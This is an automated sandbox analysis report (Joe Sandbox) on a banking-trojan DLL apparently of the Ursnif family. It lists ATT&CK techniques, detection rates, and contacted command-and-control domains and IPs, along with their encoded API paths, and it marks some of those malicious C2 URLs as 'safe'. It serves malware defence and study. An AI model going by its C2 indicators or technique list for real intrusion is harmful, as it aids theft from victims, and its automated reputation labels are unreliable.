Domain Accounts	Command and Scripting Interpreter12	Logon Script (Windows)	Access Token Manipulation1	DLL Side-Loading1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Process Injection713	Rootkit4	NTDS	System Information Discovery35	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Application Layer Protocol5	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Valid Accounts1	Cached Domain Credentials	Security Software Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Virtualization/Sandbox Evasion3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion3	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection713	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Regsvr321	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Rundll321	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	System Network Configuration Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	34%	Virustotal		Browse
SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	25%	ReversingLabs	Win32.Trojan.Ursnif

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
tls13.taboola.map.fastly.net	0%	Virustotal		Browse
c56.lepini.at	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://api3.lepini.at/api1/qid4UkFjrmJwDqv1uGoy3/_2BUJEVRCzS4dgw_/2BQScQk8a3HbiWi/d_2FOUrdxgv_2FzWHk	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://api10.laptok.at/api1/CVkO0YtaI5O0rIFRU/dT4qwboWJixM/lD45ufaeNnI/cacgVxu7PaX2PX/1lYOIQMGvnkM47	0%	Avira URL Cloud	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
https://bealion.com/politica-de-cookies	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://channelpilot.co.uk/privacy-policy	0%	URL Reputation	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	URL Reputation	safe
http://www.kkbox.com.tw/	0%	URL Reputation	safe
http://www.kkbox.com.tw/	0%	URL Reputation	safe
http://www.kkbox.com.tw/	0%	URL Reputation	safe
http://search.goo.ne.jp/favicon.ico	0%	URL Reputation	safe
http://search.goo.ne.jp/favicon.ico	0%	URL Reputation	safe
http://search.goo.ne.jp/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/	0%	URL Reputation	safe
http://www.etmall.com.tw/	0%	URL Reputation	safe
http://www.etmall.com.tw/	0%	URL Reputation	safe
http://www.amazon.co.uk/	0%	URL Reputation	safe
http://www.amazon.co.uk/	0%	URL Reputation	safe
http://www.amazon.co.uk/	0%	URL Reputation	safe
http://www.asharqalawsat.com/favicon.ico	0%	URL Reputation	safe
http://www.asharqalawsat.com/favicon.ico	0%	URL Reputation	safe
http://www.asharqalawsat.com/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/	0%	URL Reputation	safe
http://search.ipop.co.kr/	0%	URL Reputation	safe
http://search.ipop.co.kr/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
contextual.media.net	104.84.56.24	true	false		high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	0%, Virustotal, Browse	unknown
hblg.media.net	104.84.56.24	true	false		high
c56.lepini.at	45.138.24.6	true	true	8%, Virustotal, Browse	unknown
lg3.media.net	104.84.56.24	true	false		high
resolver1.opendns.com	208.67.222.222	true	false		high
api3.lepini.at	45.138.24.6	true	false		unknown
api10.laptok.at	45.138.24.6	true	false		unknown
web.vortex.data.msn.com	unknown	unknown	false		high
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	true		unknown
cvision.media.net	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.dailymail.co.uk/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://constitution.org/usdeclar.txtC:	regsvr32.exe, 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, explorer.exe, 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://api3.lepini.at/api1/qid4UkFjrmJwDqv1uGoy3/_2BUJEVRCzS4dgw_/2BQScQk8a3HbiWi/d_2FOUrdxgv_2FzWHk	explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	~DFFF48C403F4BCBE81.TMP.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	85-0f8009-68ddb2ab[1].js.5.dr	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://msk.afisha.ru/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.reddit.com/	msapplication.xml4.4.dr	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.5.dr	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.hanafos.com/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/news/other/auto-der-milit%c3%a4rpolizei-kollidiert-mit-tram/ar-BB1cZe9U?oc	de-ch[1].htm.5.dr	false		high
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	85-0f8009-68ddb2ab[1].js.5.dr	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://api10.laptok.at/api1/CVkO0YtaI5O0rIFRU/dT4qwboWJixM/lD45ufaeNnI/cacgVxu7PaX2PX/1lYOIQMGvnkM47	{92E377B0-5C93-11EB-90EB-ECF4BBEA1588}.dat.4.dr, ~DF52531A3CB90001E8.TMP.4.dr	false	Avira URL Cloud: safe	unknown
http://buscar.ozu.es/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bealion.com/politica-de-cookies	iab2Data[1].json.5.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch	de-ch[1].htm.5.dr	false		high
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.amazon.de/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	85-0f8009-68ddb2ab[1].js.5.dr	false		high
https://www.skype.com/de	85-0f8009-68ddb2ab[1].js.5.dr	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.gmarket.co.kr/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.5.dr	false		high
http://www.google.si/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
https://channelpilot.co.uk/privacy-policy	iab2Data[1].json.5.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com;OneDrive-App	85-0f8009-68ddb2ab[1].js.5.dr	false	Avira URL Cloud: safe	low
http://www.soso.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://busca.orange.es/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.twitter.com/	msapplication.xml5.4.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	85-0f8009-68ddb2ab[1].js.5.dr	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp	false		high
http://www.target.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	false		high
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.com/	de-ch[1].htm.5.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	~DFFF48C403F4BCBE81.TMP.4.dr	false		high
https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"	de-ch[1].htm.5.dr	false		high
http://search.centrum.cz/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	false		high
http://service2.bfast.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.msn.com/de-ch/?ocid=iehp	~DFFF48C403F4BCBE81.TMP.4.dr	false		high
http://ariadna.elmundo.es/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.news.com.au/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.cdiscount.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.tiscali.it/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://it.search.yahoo.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.ceneo.pl/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.servicios.clarin.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://search.daum.net/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.kkbox.com.tw/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.goo.ne.jp/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.msn.com/results.aspx?q=	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://list.taobao.com/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.nytimes.com/	msapplication.xml3.4.dr	false		high
http://www.taobao.com/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ie.search.yahoo.com/os?command=	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.cnet.com/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.linternaute.com/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.amazon.co.uk/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.cdiscount.com/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.5.dr	false		high
http://www.asharqalawsat.com/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.fr/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://search.gismeteo.ru/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.rtl.de/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.soso.com/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
http://www.univision.com/favicon.ico	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false		high
https://outlook.live.com/calendar	85-0f8009-68ddb2ab[1].js.5.dr	false		high
http://search.ipop.co.kr/	explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.138.24.6	unknown	Turkey		62068	SPECTRAIPSpectraIPBVNL	true
151.101.1.44	unknown	United States		54113	FASTLYUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	343096
Start date:	22.01.2021
Start time:	10:21:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 2s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.14295 (renamed file extension from 14295 to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.evad.winDLL@43/151@17/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Created / dropped Files have been reduced to 100 Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.147.198.201, 88.221.62.148, 131.253.33.203, 204.79.197.200, 13.107.21.200, 92.122.213.192, 92.122.213.231, 65.55.44.109, 104.84.56.24, 51.104.139.180, 152.199.19.161, 92.122.213.247, 92.122.213.194, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a-0003.dc-msedge.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, cvision.media.net.edgekey.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, a767.dscg3.akamai.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:24:19	API Interceptor	36x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
151.101.1.44	http://s3-eu-west-1.amazonaws.com/hjdpjni/ogbim#qs=r-acacaeeikdgeadkieeefjaehbihabababaefahcaccajbiackdcagfkbkacb	Get hash	malicious	Browse	cdn.taboola.com/libtrc/w4llc-network/loader.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
contextual.media.net	pan0ramic0.jpg.dll	Get hash	malicious	Browse	2.18.68.31
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	104.76.200.23
	SecuriteInfo.com.Trojan.Dridex.735.31734.dll	Get hash	malicious	Browse	2.20.86.97
	SecuriteInfo.com.Trojan.Dridex.735.12612.dll	Get hash	malicious	Browse	2.20.86.97
	SecuriteInfo.com.Trojan.Dridex.735.4639.dll	Get hash	malicious	Browse	2.20.86.97
	SecuriteInfo.com.Trojan.Dridex.735.24961.dll	Get hash	malicious	Browse	2.20.86.97
	SecuriteInfo.com.Trojan.Dridex.735.6647.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Trojan.Dridex.735.4309.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Trojan.Dridex.735.30163.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Trojan.Dridex.735.17436.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Trojan.Dridex.735.15942.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Trojan.Dridex.735.27526.dll	Get hash	malicious	Browse	92.122.146.68
	SecuriteInfo.com.Trojan.Dridex.735.71.dll	Get hash	malicious	Browse	92.122.146.68
